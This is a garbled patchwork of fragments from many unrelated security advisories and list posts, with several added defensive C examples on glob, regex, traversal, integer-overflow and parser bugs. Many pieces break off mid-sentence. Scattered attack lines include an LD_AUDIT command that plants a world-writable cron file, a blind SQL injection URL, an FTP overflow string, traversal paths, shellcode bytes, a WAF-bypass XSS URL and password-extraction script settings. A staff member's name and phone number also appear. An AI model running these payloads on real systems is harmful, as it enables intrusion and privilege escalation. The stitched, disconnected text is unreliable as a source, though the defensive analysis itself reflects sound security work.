SYNOPSIS
#include <fnmatch.h>
int
fnmatch(const char *pattern, const char *string, int flags);
--- 1. Multiple Vendors libc/fnmatch(3) DoS (incl apache poc) ---
An attacker who can control the first and second parameters (pattern, string) of fnmatch(3) can cause CPU resource exhaustion. To see how large the complexity of the problem is, try compiling the code below:
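The PoC itself is not reproduced here. As an added illustration (not code from the original advisory, and not glibc's implementation), the toy matcher below is structured the way the classic recursive fnmatch(3) loop is: on every "*" it tries each possible split point of the remaining string and recurses on the rest of the pattern, with no memoisation. A step counter shows why attacker-controlled patterns are expensive: against a string of twelve 'a's that can never match, each additional "*a" in a pattern of the form "*a*a...*a*b" raises the polynomial degree of the search by one (the counts follow a sum of binomial coefficients). The pattern shape and the twelve-character input are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Step counter: incremented once per recursive call to glob_match(). */
static unsigned long g_steps;

/* Minimal backtracking matcher for '*' and '?', structured like the classic
 * recursive fnmatch(3) loop: on '*' it tries every split point of the
 * remaining string and recurses on the rest of the pattern. There is no
 * memoisation, so the same suffixes are re-examined over and over. */
static int glob_match(const char *p, const char *s)
{
    g_steps++;
    for (; *p != '\0'; p++, s++) {
        if (*p == '*') {
            while (p[1] == '*')
                p++;                          /* a run of stars acts as one */
            if (p[1] == '\0')
                return 1;                     /* trailing '*' matches the rest */
            for (const char *t = s; ; t++) {  /* try every split point */
                if (glob_match(p + 1, t))
                    return 1;
                if (*t == '\0')
                    return 0;
            }
        }
        if (*s == '\0')
            return 0;                         /* pattern outlives the string */
        if (*p != '?' && *p != *s)
            return 0;                         /* literal mismatch */
    }
    return *s == '\0';                        /* both must be exhausted */
}

/* 1 if pattern matches string, 0 otherwise. */
int toy_fnmatch(const char *pattern, const char *string)
{
    return glob_match(pattern, string);
}

/* Number of recursive steps one match attempt costs. */
unsigned long match_steps(const char *pattern, const char *string)
{
    g_steps = 0;
    glob_match(pattern, string);
    return g_steps;
}

/* Build the constructed pattern "*a*a...*a*b" with k "*a" groups before the
 * final "*b". 'buf' must hold at least 2*k + 3 bytes. */
void build_pattern(char *buf, int k)
{
    int i;
    for (i = 0; i < k; i++) {
        buf[2 * i] = '*';
        buf[2 * i + 1] = 'a';
    }
    buf[2 * k] = '*';
    buf[2 * k + 1] = 'b';
    buf[2 * k + 2] = '\0';
}

int main(void)
{
    char pattern[64];
    const char *string = "aaaaaaaaaaaa";   /* 12 'a's: can never match "...*b" */
    int k;

    /* Each extra "*a" raises the degree of the search by one. */
    for (k = 1; k <= 6; k++) {
        build_pattern(pattern, k);
        printf("%-16s vs %s : %lu steps\n", pattern, string,
               match_steps(pattern, string));
    }
    return 0;
}
```

Real fnmatch(3) implementations differ in detail (glibc collapses consecutive stars and handles bracket expressions and multibyte input), but the recursive "try every split point" structure is what makes pattern length a cost multiplier; any code that passes attacker-controlled patterns to fnmatch(3) should cap the pattern length and the number of wildcards.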
!pvefindaddr findmsp :
Log data
0BADF00D -------------------------------------------------------------------------
0BADF00D Searching for metasploit pattern references
0BADF00D -------------------------------------------------------------------------
0BADF00D [1] Checking register addresses and contents
0BADF00D ============================================
0BADF00D Register EDI points to Metasploit pattern at position 0
0BADF00D Register EAX is overwritten with Metasploit pattern at position 4096
be executed under the following scenario:
1. The guest machine must be a Windows XP with SP2 or SP3.
2. The user running the PoC must have admin privileges.
The PoC scans the whole of kernel memory looking for a pattern of
code located in the network driver 'netvsc50.sys' on the guest machine.
The code is in the function 'PkSendPacketSimple' and is a call to the
function 'memcpy'.
When that pattern is located in the driver code, the entry of the
--- 0.Description ---
#include <glob.h>
int glob(const char *pattern, int flags,
int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);
Description
This function expands a filename wildcard which is passed as pattern.
- --- 1. RE_DUP_MAX overflow ---
The main problem exists in the regcomp(3) function of the GNU libc implementation. Let's try to understand it.
- ---
int
regcomp (preg, pattern, cflags)
regex_t *__restrict preg;
const char *__restrict pattern;
int cflags;
{
- ---
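The advisory's point is that repetition counts in interval expressions are parsed by regcomp(3) against RE_DUP_MAX, and an application that hands untrusted patterns to the library has no say in that limit. The following is an added example, not code from the advisory or from glibc: a small scanner that finds the largest repetition count in an ERE (or BRE "\{m,n\}") interval, and a regcomp wrapper that refuses any pattern whose count exceeds an application-chosen cap before the library ever parses it. Simplifying assumptions are marked in the comments; the sample patterns are constructed.

```c
#include <limits.h>
#include <regex.h>
#include <stddef.h>
#include <stdio.h>

#ifndef RE_DUP_MAX
#define RE_DUP_MAX 255          /* _POSIX2_RE_DUP_MAX fallback */
#endif

/* Largest repetition count appearing in any interval ({m}, {m,} or {m,n},
 * or the BRE form \{m,n\}); -1 if the pattern contains none. Escaped
 * characters and bracket expressions are skipped. Assumption: a ']' as the
 * first character of a bracket expression is not special-cased. Counts that
 * would overflow 'long' saturate at LONG_MAX instead of wrapping. */
long max_interval_count(const char *re)
{
    long best = -1;
    int in_bracket = 0;
    const char *p;

    for (p = re; *p != '\0'; p++) {
        if (in_bracket) {
            if (*p == ']')
                in_bracket = 0;
            continue;
        }
        if (*p == '\\' && p[1] == '{') {
            p++;                              /* BRE interval "\{m,n\}" */
        } else if (*p == '\\') {
            if (p[1] != '\0')
                p++;                          /* skip the escaped character */
            continue;
        } else if (*p == '[') {
            in_bracket = 1;
            continue;
        } else if (*p != '{') {
            continue;
        }

        /* p points at '{': read digits and commas until anything else. */
        const char *q = p + 1;
        while (*q == ',' || (*q >= '0' && *q <= '9')) {
            if (*q == ',') {
                q++;
                continue;
            }
            long n = 0;
            while (*q >= '0' && *q <= '9') {
                if (n > (LONG_MAX - 9) / 10)
                    n = LONG_MAX;             /* saturate, never wrap */
                else
                    n = n * 10 + (*q - '0');
                q++;
            }
            if (n > best)
                best = n;
        }
    }
    return best;
}

/* regcomp(3) wrapper: refuse any interval above 'cap' up front. 'cap' is an
 * application policy (assumption: a value well below RE_DUP_MAX is sensible
 * for untrusted input); refused patterns report REG_ESIZE. */
int safe_regcomp(regex_t *preg, const char *re, int cflags, long cap)
{
    if (max_interval_count(re) > cap)
        return REG_ESIZE;
    return regcomp(preg, re, cflags);
}

/* Compile-and-discard helper: 0 when 're' is accepted under 'cap'. */
int compile_status(const char *re, long cap)
{
    regex_t rx;
    int rc = safe_regcomp(&rx, re, REG_EXTENDED | REG_NOSUB, cap);
    if (rc == 0)
        regfree(&rx);
    return rc;
}

int main(void)
{
    /* Constructed patterns: a modest one and one beyond RE_DUP_MAX. */
    const char *ok = "a{1,3}(bc){2}";
    const char *huge = "a{40000}";
    printf("RE_DUP_MAX on this libc: %ld\n", (long)RE_DUP_MAX);
    printf("%-16s -> max count %ld, status %d\n", ok,
           max_interval_count(ok), compile_status(ok, RE_DUP_MAX));
    printf("%-16s -> max count %ld, status %d\n", huge,
           max_interval_count(huge), compile_status(huge, RE_DUP_MAX));
    return 0;
}
```

The wrapper does not replace the library's own checks; it lets the application pick a limit it can reason about, and it also catches nested or repeated intervals (such as several "{32767}" in one pattern) that are individually within RE_DUP_MAX but together inflate the compiled automaton.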
- ---
...
* parsing and handling. There is broad potential for any given fnmatch(3)
* implementation to be buggy.
*
* Currently supported pattern(s):
* - any number of wildcards, "*" or "?"
* - {,} syntax (not nested)
...
- ---
This is the ``filetype.vim'' vulnerability, described in the sections
3.4.2.1. and 3.4.2.2. of the original advisory[1]. It can lead to
arbitrary code execution upon Vim opening a crafted file. The file can
be either local or remote, and the filename must match one of the
following glob patterns:
*.asm
*.s
*.S
*.a
queries to ns.victim.com for hosts in the cache-poisoning.net zone.
Ns.victim.com will query the name server for cache-poisoning.net. The
attacker records the transaction IDs of the requests sent to the name
server of cache-poisoning.net by ns.victim.com.
Microsoft DNS transaction IDs follow a certain pattern. There seem to
be 8 independent counters that are randomly incremented. Each
transaction ID is taken from a randomly chosen counter, so there are 8
sequences of randomly incrementing numbers. The sample of transaction IDs
below illustrates that:
--- sendump.c ---
/*
* sendump - FreeBSD-SA-05:02.sendfile exploit - 2005/04/16.
* Updated for FreeBSD 5.x, added alternate hash types, added optional
* relaxed pattern matching - 2005/04/21.
*
* This program is meant to be used in controlled environments only.
* If found in the wild, please return to ... wait, this is public now,
* and this program is hereby placed in the public domain. Feel free to
* reuse parts of the source code, etc.
. 'ClientConnection::ReadFailureReason() : 3066'
Other versions may be vulnerable too.
Multiple VNC clients are affected, as they share the vulnerable code.
The integer overflow follows this pattern:
/-----------
unsigned int len; /* note the *unsigned int* */
But you'd have no idea where to start or end the tracing. This, in
effect, gives unlimited possible combinations based on differing
starting and ending points of the same pattern.
Shannon Francis
IT Security Compliance Analyst
JetBlue Airways
8265 Hanger Blvd
Orlando, FL 32827
Tel: 407.375.0405
----------------------
A] directory traversal
----------------------
WebMod uses an anti-directory-traversal check which searches for any
"../" pattern in the client's HTTP request.
So it is enough to use a "..\" pattern to bypass the check and be
able to download any file from the disk where Half-Life is running,
including the configuration files of the game server (such as
..\..\..\..\platform\config\server.vdf or ..\..\..\server.cfg).
Note that this bug works only on Windows servers.
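The flaw is a check that matches one spelling of the separator while the operating system accepts two. The following is an added example, not WebMod's code: the substring check as the advisory describes it, beside a check that splits the path on both "/" and "\" and rejects any ".." component. It assumes the request path has already been URL-decoded (an encoded "%2e%2e" would otherwise slip past both). The sample paths are taken from the advisory text or constructed.

```c
#include <stdio.h>
#include <string.h>

/* The check as described: reject only a literal "../" substring.
 * Returns 1 if the path is rejected, 0 if it is allowed through. */
int naive_traversal_check(const char *path)
{
    return strstr(path, "../") != NULL;
}

/* Hardened variant: treat '\\' like '/' (Windows accepts both) and reject a
 * ".." path component whatever separator surrounds it. ".." inside a longer
 * component (e.g. "de_dust..bsp") is a legal file name and is allowed.
 * Assumption: 'path' has already been URL-decoded. */
int hardened_traversal_check(const char *path)
{
    const char *p = path;
    while (*p != '\0') {
        const char *end = p;                /* p: start of a component */
        while (*end != '\0' && *end != '/' && *end != '\\')
            end++;
        if (end - p == 2 && p[0] == '.' && p[1] == '.')
            return 1;                       /* ".." component found */
        if (*end == '\0')
            break;
        p = end + 1;                        /* skip the separator */
    }
    return 0;
}

int main(void)
{
    const char *samples[] = {
        "../../server.cfg",                          /* caught by both */
        "..\\..\\..\\server.cfg",                    /* the bypass */
        "..\\..\\..\\..\\platform\\config\\server.vdf",
        "maps/de_dust..bsp",                         /* legitimate name */
    };
    unsigned i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-45s naive=%d hardened=%d\n", samples[i],
               naive_traversal_check(samples[i]),
               hardened_traversal_check(samples[i]));
    return 0;
}
```

A component check is still only a filter; the robust form is to resolve the requested name against the document root and refuse anything whose canonical path leaves that root.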
# elevated privileges, as it creates the file specified in the output
# environment variable.
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
# This results in creating a world writable file in the crontab directory.
$ ls -l /etc/cron.d/exploit
Increments _EncryptionKeyCount by 0x100 and makes some 'calculations'
with (current time.lowpart + _EncryptionKeyCount), resulting in a
DWORD value with the following 'pattern':
seed = CT[1], CT[2]-1, CT[2], CT[1]+1;
where CT = (current time.lowpart + _EncryptionKeyCount)
#include <process.h>
/****************************************************************************/
unsigned int get_pop_pop_ret ( char );
int is_pattern ( unsigned char * , unsigned int , unsigned int * );
/****************************************************************************/
char get_code_address [] = ""
"\xe8\xff\xff\xff\xff\xf0" // "call $-1"
http://lcamtuf.coredump.cx/focus-webkit/
It's not very serious, but cuter than clickjacking proper. WebKit
focus behavior on Windows makes this particular PoC easier there, but
I believe that no browser is designed to counter this general attack
pattern in any particular way. The usual opt-in mitigations
(X-Frame-Options, frame busting) should offer a reasonable degree of
protection already.
[1] http://code.google.com/p/browsersec/wiki/Part2#Arbitrary_page_mashups_%28UI_redressing%29
[2] http://lcamtuf.coredump.cx/focusbug/ and so forth
Hacking Printers for fun and profit
Andrei Constin
DarunGrim - A Tool for Binary Diffing and Automatic Vulnerabilities
Pattern Matching
Jeongwook (Matt) Oh
Immature Femtocells
Ravishankar Borgaonkar & Kevin Redon, Technical University of Berlin
has_mbyte ? vim_iswordp(mb_prevptr(ml_get_curline(), ptr)) :
#endif
vim_iswordc(ptr[-1])))
STRCAT(buf, "\\>");
#ifdef FEAT_CMDHIST
/* put pattern in search history */
add_to_history(HIST_SEARCH, buf, TRUE, NUL);
#endif
normal_search(cap, cmdchar == '*' ? '/' : '?', buf, 0);
}
else
expect around 32768 connection-killing attempts before they are likely
to succeed. This level of disruption would certainly be noticed and it
is highly unlikely that any user would retry the connection enough times
for the attack to succeed.
The usage pattern where the attack is most likely to succeed is where an
automated connection is configured to retry indefinitely in the event of
errors. In this case, it might be possible to recover as much as 14 bits
of plaintext per hour (assuming a very fast 10 connections per second).
Implementing a limit on the number of connection retries (e.g. 256) is
sufficient to render the attack infeasible for this case.
#$ ./getpassword.sh
#74b444ff2785ea8bb9ae02c13b6a71f1
HOST="HOST"
TARGET_USER="0x61646d696e" #admin
PATTERN="Interval"
COOKIE="rq842tci6e5ib7t918c6sv1ml4"
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v
w x y z)
GROUP_ID=2
An overlong string as DSC comment (more than 42000 bytes)
results in a direct EIP overwrite.
Exception is first-chance so the program will never crash.
At the moment of the redirection EAX and ESI are user-controlled.
This portion of the buffer begins with '%' (it is the next DSC
comment) but as you can see the resulting pattern is
nop-equivalent.
Tested and working against xp sp3
change the call esi if you need, must be alphabetic
I used a "call esi" from comctl32.dll on xp sp3,
and Daniel Austin.
-[ Collision Course
The main goal of “Collision Course” is to help people understand and
evaluate the security approach some IPS/IDS still have: Pattern Matching.
But after restarting the research I realized that it could be more than
just bypassing an IPS/IDS. Both NNG (Numb Next Generation) and ENG (Encore
Next Generation) are available @ PacketStorm16.
1. NNG:
http://www.packetstormsecurity.com/UNIX/IDS/nng-4.13r-public.rar
code execution when processing large strings. A number of other
GNOME-related applications which predate glib are vulnerable due to the
commonality of this flawed code.
In all cases, heap memory is allocated using a length calculated with a
user-supplied, platform-specific value. It follows the pattern below:
g_malloc(user_supplied_length * 3 / 4 + some_small_num)
Due to the evaluation order of arithmetic operations, the length is
multiplied by 3 prior to division by 4. This will allow the calculated
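The following is an added example, not glib's code: the size calculation as the text describes it, computed on an explicit 32-bit unsigned type (the width of gsize on the 32-bit platforms the text calls "platform-specific"), beside a form that divides before multiplying so no intermediate can exceed the input, and that guards the final addition. The small constant the text leaves unspecified is passed in as 'slack'; the sample lengths are constructed.

```c
#include <stdint.h>
#include <stdio.h>

/* The calculation as the text describes it, on a 32-bit size type: the
 * multiplication by 3 happens first and wraps silently once len exceeds
 * 0x55555555. 'slack' stands in for the unspecified small constant. */
uint32_t decode_size_unsafe(uint32_t len, uint32_t slack)
{
    return len * 3 / 4 + slack;
}

/* Safe form: split len into whole 4-byte groups and a remainder so that no
 * intermediate exceeds len, then guard the final addition. Returns 0 to
 * signal overflow; callers must refuse a 0 result rather than allocate it. */
uint32_t decode_size_safe(uint32_t len, uint32_t slack)
{
    uint32_t whole = (len / 4) * 3;       /* at most 0xBFFFFFFD */
    uint32_t part = (len % 4) * 3 / 4;    /* 0, 0, 1 or 2 */
    uint32_t out = whole + part;          /* equals floor(len*3/4) exactly */
    if (out > UINT32_MAX - slack)
        return 0;
    return out + slack;
}

/* 1 if the unsafe formula under-allocates for this length. */
int undersized(uint32_t len, uint32_t slack)
{
    return decode_size_unsafe(len, slack) < decode_size_safe(len, slack);
}

int main(void)
{
    /* Constructed lengths: a normal one and three at or past the wrap point. */
    uint32_t lens[] = { 100, 0x55555556u, 0x60000000u, 0xFFFFFFFFu };
    unsigned i;
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("len=0x%08x unsafe=0x%08x safe=0x%08x %s\n",
               (unsigned)lens[i],
               (unsigned)decode_size_unsafe(lens[i], 1),
               (unsigned)decode_size_safe(lens[i], 1),
               undersized(lens[i], 1) ? "UNDERSIZED" : "ok");
    return 0;
}
```

Once the buffer is undersized, the decoder that writes three output bytes per four input characters runs off the end of the heap allocation, which is the overflow the advisory describes.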
Profense Web Application Firewall configured in positive model can be evaded.
Technical details:
Profense Web Application Firewall configured to make use of the strong positive model (white-list approach) can be evaded to launch various attacks including XSS (Cross-Site Scripting), SQL Injection, remote command execution, and others.
The vulnerability can be reproduced by making use of a URL-encoded new line character. The pattern matching in multi-line mode matches any non-hostile line and marks the whole request as legitimate, thus allowing the request. This results in a bypass of the positive model. An example is shown below:
http://testcases/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass
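In POSIX regex terms the "multi line mode" the advisory describes is REG_NEWLINE: with it, "^" and "$" also match at an embedded newline, so a whitelist anchored with them is satisfied by the harmless last line of a value. The block below is an added example with a constructed whitelist rule (only ASCII letters and digits); it is not Profense's rule set. It shows the same decoded value passing under REG_NEWLINE and failing without it, plus a hardened check that rejects control characters before any pattern runs.

```c
#include <regex.h>
#include <stdio.h>
#include <string.h>

/* Positive-model rule: a parameter value may contain only ASCII letters and
 * digits. Constructed for the demonstration, not the product's own rule. */
#define WHITELIST_RE "^[A-Za-z0-9]+$"

/* Returns 1 if the rule accepts 'value', 0 if not, -1 on regcomp failure.
 * With multiline != 0 the rule is compiled with REG_NEWLINE, so '^' and '$'
 * also match around embedded newlines: that is the "multi line mode" the
 * advisory exploits. */
int whitelist_allows(const char *value, int multiline)
{
    regex_t rx;
    int rc;
    int flags = REG_EXTENDED | REG_NOSUB;
    if (multiline)
        flags |= REG_NEWLINE;
    if (regcomp(&rx, WHITELIST_RE, flags) != 0)
        return -1;
    rc = regexec(&rx, value, 0, NULL, 0);
    regfree(&rx);
    return rc == 0;
}

/* Hardened check: refuse control characters (including '\n') up front, then
 * match without REG_NEWLINE so the anchors bind to the whole value. */
int whitelist_allows_hardened(const char *value)
{
    const unsigned char *p;
    for (p = (const unsigned char *)value; *p != '\0'; p++)
        if (*p < 0x20 || *p == 0x7f)
            return 0;
    return whitelist_allows(value, 0);
}

int main(void)
{
    /* The decoded value from the advisory's URL: "%0A" has become '\n'. */
    const char *evil = "<Evil script goes here>=\nByPass";
    printf("multiline : %d\n", whitelist_allows(evil, 1));   /* evaded  */
    printf("anchored  : %d\n", whitelist_allows(evil, 0));   /* blocked */
    printf("hardened  : %d\n", whitelist_allows_hardened(evil));
    return 0;
}
```

The same pitfall exists in other engines (PCRE's "m" flag, Python's re.MULTILINE), and "$" in many engines matches before a trailing newline even without multi-line mode, which is why rejecting control characters first is the safer order.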
$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error());
-----------------------------[source code end]---------------------------------
This specific SQL injection vulnerability can be exploited using blind attack
methods. If there are one or more active torrents in the database, then the
attack pattern below is usable:
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1
and we see the torrents that were found.
* MPlayer contains a stack buffer overflow vulnerability while parsing
malformed TwinVQ media files.
* The TWIN constant expression for TwinVQ is always followed by an 8-digit
version number.
* COMM is the standard sub-chunk; it follows a 4-byte size field relative
to the TWIN pattern.
* The unsigned Data_size value from the DSIZ sub-chunk is where the
vulnerability lies.
* In the malicious file I analyzed, the sub-chunk size is 8191 bytes
(0x00001fff).
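The bug class is a length field read from the file and trusted by a copy into a fixed-size stack buffer. The following is an added example, not MPlayer's demuxer: a chunk reader for the layout the bullets describe, with two checks the text says are missing: the declared size is validated against the bytes actually present, and again against the destination buffer before memcpy. The exact layout (big-endian 4-byte sizes directly after a 4-byte id, an 8-digit version right after "TWIN") is an assumption for the demonstration, as are the sample files, which are built in memory.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout (not taken from the MPlayer source): "TWIN", 8 ASCII
 * version digits, then sub-chunks of a 4-byte id, a 4-byte big-endian
 * unsigned size and 'size' bytes of payload. */
#define TWIN_HDR 12

static uint32_t get_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

static void put_be32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v;
}

/* Locate sub-chunk 'id'. Returns 0 and fills size/offset on success, -1 for
 * a bad header or a missing chunk, -2 when a declared size runs past the end
 * of the data: an unsigned size cannot go negative, but it can exceed the
 * file, so it must be validated before it is trusted. */
int find_subchunk(const unsigned char *buf, size_t len, const char *id,
                  uint32_t *size_out, size_t *data_off)
{
    size_t off = TWIN_HDR;
    if (len < TWIN_HDR || memcmp(buf, "TWIN", 4) != 0)
        return -1;
    while (off + 8 <= len) {
        uint32_t size = get_be32(buf + off + 4);
        if (size > len - (off + 8))
            return -2;
        if (memcmp(buf + off, id, 4) == 0) {
            *size_out = size;
            *data_off = off + 8;
            return 0;
        }
        off += 8 + size;
    }
    return -1;
}

/* Copy the payload of 'id' into a fixed-size buffer only after checking the
 * declared size against the destination: the bounds check a stack overflow
 * of the kind described is missing. Returns bytes copied or -1. */
int copy_subchunk_checked(const unsigned char *buf, size_t len, const char *id,
                          unsigned char *dst, size_t dstlen)
{
    uint32_t size;
    size_t data;
    if (find_subchunk(buf, len, id, &size, &data) != 0)
        return -1;
    if (size > dstlen)
        return -1;
    memcpy(dst, buf + data, size);
    return (int)size;
}

/* Constructed sample: header, a COMM chunk of comm_size 'A' bytes, then a
 * DSIZ chunk that declares dsiz_declared bytes but carries only 4.
 * 'out' must hold TWIN_HDR + 8 + comm_size + 12 bytes; returns the length. */
size_t build_sample(unsigned char *out, uint32_t comm_size, uint32_t dsiz_declared)
{
    size_t off = 0;
    memcpy(out, "TWIN00000001", TWIN_HDR);
    off += TWIN_HDR;
    memcpy(out + off, "COMM", 4);
    put_be32(out + off + 4, comm_size);
    memset(out + off + 8, 'A', comm_size);
    off += 8 + comm_size;
    memcpy(out + off, "DSIZ", 4);
    put_be32(out + off + 4, dsiz_declared);
    memset(out + off + 8, 0, 4);
    return off + 12;
}

int scenario_benign(void)        /* 8-byte COMM into a 16-byte buffer: 8 */
{
    unsigned char file[128], dst[16];
    size_t len = build_sample(file, 8, 4);
    return copy_subchunk_checked(file, len, "COMM", dst, sizeof dst);
}

int scenario_too_big(void)       /* 64-byte COMM into a 16-byte buffer: -1 */
{
    unsigned char file[128], dst[16];
    size_t len = build_sample(file, 64, 4);
    return copy_subchunk_checked(file, len, "COMM", dst, sizeof dst);
}

int scenario_hostile_dsiz(void)  /* DSIZ declares 0x1fff, carries 4: -2 */
{
    unsigned char file[128];
    uint32_t size;
    size_t data;
    size_t len = build_sample(file, 8, 0x1fff);
    return find_subchunk(file, len, "DSIZ", &size, &data);
}
```

The second scenario is the advisory's case in miniature: a declared size that the file really does carry, but that exceeds the fixed buffer the parser copies into.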
IV. DETECTION
iDefense has confirmed the existence of this vulnerability inside
Microsoft's ATL and MFC. Although later versions of the ATL/MFC are
less vulnerable, certain conditions can trigger the same exploit
pattern.
Any code compiled with these libraries may also be vulnerable. Specific
controls compiled with vulnerable versions include Adobe Flash and
Sun's Java plug-in.
no, MKDIR is *not* required, also write access is *not* required.
Assuming a directory with a name that starts with "A" exists and that is
at least 14 chars long, this pattern will trigger the overflow:
NLST [Ax206]*/../A*/../A*/../A*/../A*/../A*/../A*/../A*/\r\n
At least on win2k3. Therefore, the workarounds for kb975191 on
function is
called in body upload. The function is called in a suppressed manner and
kills the
parent window directly by default which makes it vulnerable to denial of
service attack.
This shortcoming in Google Chrome diversifies the attack pattern, as a number
of events can execute this function without a security check prompting the
user to allow the event to trigger.
This security issue is a result of design flaw in the browser as
Florian Weimer wrote:
> * Theo de Raadt:
>> Management eventually has to decide to impact the SLA's of all domains.
>> That means that Sun's promise of isolation is bunk.
>
> I don't want to downplay your frustration, but the pattern is fairly
> common: When someone tries to port a new operating system to some
> partitioning system, it's not totally unheard of that the new code takes
> down (parts of) the system beyond the assigned partition.
Something that seems to be being missed is that it doesn't matter HOW the